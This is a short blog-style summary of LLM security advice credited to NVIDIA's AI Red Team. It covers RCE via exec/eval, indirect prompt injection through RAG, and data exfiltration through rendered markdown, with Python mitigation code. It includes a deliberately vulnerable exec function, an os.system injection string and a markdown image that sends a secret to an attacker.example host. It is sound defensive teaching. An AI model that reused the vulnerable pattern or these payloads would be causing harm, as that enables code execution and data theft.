Practical LLM Security Advice from the NVIDIA AI Red Team | NVIDIA Technical Blog
LLM-based applications face three recurring classes of vulnerability:

- **Remote code execution (RCE):** passing LLM-generated code to functions like `exec` or `eval` without proper sandboxing lets an attacker, often via prompt injection, run arbitrary code.
- **Insecure RAG access controls:** overly broad permissions in Retrieval-Augmented Generation (RAG) data stores can leak sensitive documents and enable indirect prompt injection through retrieved content.
- **Active content rendering:** rendering LLM output as live markdown or HTML enables data exfiltration through embedded malicious links or images.
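To make the RCE and exfiltration patterns concrete, here is a minimal sketch (not from the original article; function names and the arithmetic-only policy are illustrative assumptions). It shows the vulnerable `exec` pattern, a restrictive guard that only evaluates plain arithmetic with builtins stripped, and a sanitizer that removes markdown images before rendering. A real deployment should isolate execution in a separate process or container rather than rely on a filter like this.

```python
import re

def run_llm_code_unsafely(llm_output: str) -> None:
    """The RCE anti-pattern: injected prompts can make the model emit
    arbitrary code, which exec() runs with full interpreter access."""
    exec(llm_output)  # vulnerable: no sandbox

# Illustrative mitigation: only evaluate a single arithmetic expression,
# with builtins emptied so names like __import__ are unavailable.
_SAFE_EXPR = re.compile(r"^[\d\s+\-*/().]+$")

def run_llm_code_guarded(llm_output: str):
    """Reject anything that is not plain arithmetic, then eval with no builtins."""
    if not _SAFE_EXPR.fullmatch(llm_output.strip()):
        raise ValueError("rejected: not a plain arithmetic expression")
    return eval(llm_output, {"__builtins__": {}}, {})

# Illustrative exfiltration defense: strip markdown images, whose URLs
# can leak data when a chat UI auto-fetches them.
_MD_IMAGE = re.compile(r"!\[[^\]]*\]\([^)]*\)")

def strip_active_content(llm_output: str) -> str:
    return _MD_IMAGE.sub("[image removed]", llm_output)
```

For example, `run_llm_code_guarded("__import__('os').system('id')")` raises `ValueError` instead of executing, and `strip_active_content` neutralizes an output like `![a](https://attacker.example/?q=SECRET)` before it reaches the renderer.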
Source: Original Report ↗